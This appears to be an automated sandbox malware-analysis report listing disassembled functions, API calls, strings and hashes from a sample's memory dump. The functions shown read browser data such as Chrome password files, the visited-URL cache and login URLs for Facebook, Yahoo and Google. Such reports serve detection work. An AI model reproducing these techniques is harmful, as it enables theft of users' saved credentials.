                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                    • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                    • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                    • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                  • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                  • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                  • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                  • String ID: $/deleteregkey$/savelangfile
                  • API String ID: 2744995895-28296030
                  • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                  • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                  • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                  • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                  Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • memset.MSVCRT ref: 0040B71C
                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                  • wcsrchr.MSVCRT ref: 0040B738
                  • memset.MSVCRT ref: 0040B756
                  • memset.MSVCRT ref: 0040B7F5
                  • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                  • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                  • memset.MSVCRT ref: 0040B851
                  • memset.MSVCRT ref: 0040B8CA
                  • memcmp.MSVCRT ref: 0040B9BF
                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                  • memset.MSVCRT ref: 0040BB53
                  • memcpy.MSVCRT ref: 0040BB66
                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                  • String ID: chp$v10
                  • API String ID: 170802307-2783969131
                  • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                  • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                  Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 512 40e304-40e316 call 406e8f 510->512 516 40e476-40e483 call 406b53 512->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->512 524->509 530 40e497-40e49f ??3@YAXPAX@Z 524->530 530->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 549 40e3b0 542->549 550 40e3b3-40e3c1 wcschr 542->550 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 551 40e3fb-40e40c memcpy 548->551 552 40e40f-40e414 548->552 549->550 550->541 555 40e3c3-40e3c6 550->555 551->552 553 40e416-40e427 memcpy 552->553 554 40e42a-40e42f 552->554 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                  APIs
                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                  • memset.MSVCRT ref: 0040E380
                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                    • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                  • wcschr.MSVCRT ref: 0040E3B8
                  • memcpy.MSVCRT ref: 0040E3EC
                  • memcpy.MSVCRT ref: 0040E407
                  • memcpy.MSVCRT ref: 0040E422
                  • memcpy.MSVCRT ref: 0040E43D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                  • API String ID: 3073804840-2252543386
                  • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                  • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                  • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                  • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                  Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 601 4094f7-4094fa call 424f26 598->601 600->567 601->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 615 4093e4-4093fb call 4253af * 2 613->615 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->601 627 409401-409403 615->627 616->617 618 409333-409345 memcmp 617->618 619 4092e5-4092ec 617->619 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->601 628 409409-40941b memcmp 627->628 628->601 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->601 633 4094b8-4094ed memcpy * 2 630->633 631->601 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->601
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                  • String ID:
                  • API String ID: 3715365532-3916222277
                  • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                  • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                  • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                  • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                  Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                    • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                    • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                  • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                  • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                  • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                  • CloseHandle.KERNEL32(?), ref: 0040E148
                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                  • String ID: bhv
                  • API String ID: 327780389-2689659898
                  • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                  • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                  • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                  • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                  Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                  APIs
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                  • API String ID: 2941347001-70141382
                  • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                  • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                  • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                  • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                  Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 696 4466f4-44670e call 446904 GetModuleHandleA 699 446710-44671b 696->699 700 44672f-446732 696->700 699->700 701 44671d-446726 699->701 702 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 700->702 704 446747-44674b 701->704 705 446728-44672d 701->705 711 4467ac-4467b7 __setusermatherr 702->711 712 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 702->712 704->700 706 44674d-44674f 704->706 705->700 708 446734-44673b 705->708 710 446755-446758 706->710 708->700 709 44673d-446745 708->709 709->710 710->702 711->712 715 446810-446819 712->715 716 44681e-446825 712->716 717 4468d8-4468dd call 44693d 715->717 718 446827-446832 716->718 719 44686c-446870 716->719 722 446834-446838 718->722 723 44683a-44683e 718->723 720 446845-44684b 719->720 721 446872-446877 719->721 727 446853-446864 GetStartupInfoW 720->727 728 44684d-446851 720->728 721->719 722->718 722->723 723->720 725 446840-446842 723->725 725->720 729 446866-44686a 727->729 730 446879-44687b 727->730 728->725 728->727 731 44687c-446894 GetModuleHandleA call 41276d 729->731 730->731 734 446896-446897 exit 731->734 735 44689d-4468d6 _cexit 731->735 734->735 735->717
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                  • String ID:
                  • API String ID: 2827331108-0
                  • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                  • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                  • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                  • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                  Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • memset.MSVCRT ref: 0040C298
                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                  • wcschr.MSVCRT ref: 0040C324
                  • wcschr.MSVCRT ref: 0040C344
                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                  • GetLastError.KERNEL32 ref: 0040C373
                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                  • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                  • String ID: visited:
                  • API String ID: 1157525455-1702587658
                  • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                  • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                  • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                  • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                  Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 762 40e175-40e1a1 call 40695d call 406b90 767 40e1a7-40e1e5 memset 762->767 768 40e299-40e2a8 call 4069a3 762->768 770 40e1e8-40e1fa call 406e8f 767->770 774 40e270-40e27d call 406b53 770->774 775 40e1fc-40e219 call 40dd50 * 2 770->775 774->770 780 40e283-40e286 774->780 775->774 786 40e21b-40e21d 775->786 783 40e291-40e294 call 40aa04 780->783 784 40e288-40e290 ??3@YAXPAX@Z 780->784 783->768 784->783 786->774 787 40e21f-40e235 call 40742e 786->787 787->774 790 40e237-40e242 call 40aae3 787->790 790->774 793 40e244-40e26b _snwprintf call 40a8d0 790->793 793->774
                  APIs
                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                  • memset.MSVCRT ref: 0040E1BD
                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                  • _snwprintf.MSVCRT ref: 0040E257
                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                  • API String ID: 3883404497-2982631422
                  • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                  • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                  Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                    • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                  • memset.MSVCRT ref: 0040BC75
                  • memset.MSVCRT ref: 0040BC8C
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                  • memcmp.MSVCRT ref: 0040BCD6
                  • memcpy.MSVCRT ref: 0040BD2B
                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                  • String ID:
                  • API String ID: 509814883-3916222277
                  • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                  • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                  • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                  • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                  Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 847 41837f-4183bf 848 4183c1-4183cc call 418197 847->848 849 4183dc-4183ec call 418160 847->849 854 4183d2-4183d8 848->854 855 418517-41851d 848->855 856 4183f6-41840b 849->856 857 4183ee-4183f1 849->857 854->849 858 418417-418423 856->858 859 41840d-418415 856->859 857->855 860 418427-418442 call 41739b 858->860 859->860 863 418444-41845d CreateFileW 860->863 864 41845f-418475 CreateFileA 860->864 865 418477-41847c 863->865 864->865 866 4184c2-4184c7 865->866 867 41847e-418495 GetLastError ??3@YAXPAX@Z 865->867 870 4184d5-418501 memset call 418758 866->870 871 4184c9-4184d3 866->871 868 4184b5-4184c0 call 444706 867->868 869 418497-4184b3 call 41837f 867->869 868->855 869->855 877 418506-418515 ??3@YAXPAX@Z 870->877 871->870 877->855
                  APIs
                  • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                  • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                  • GetLastError.KERNEL32 ref: 0041847E
                  • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: CreateFile$??3@ErrorLast
                  • String ID: |A
                  • API String ID: 1407640353-1717621600
                  • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                  • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                  • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                  • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                  Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                  • String ID: r!A
                  • API String ID: 2791114272-628097481
                  • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                  • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                  Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                    • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                  • _wcslwr.MSVCRT ref: 0040C817
                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                  • wcslen.MSVCRT ref: 0040C82C
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                  • API String ID: 62308376-4196376884
                  • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                  • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                  Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                  Download Yara Rule
                  APIs
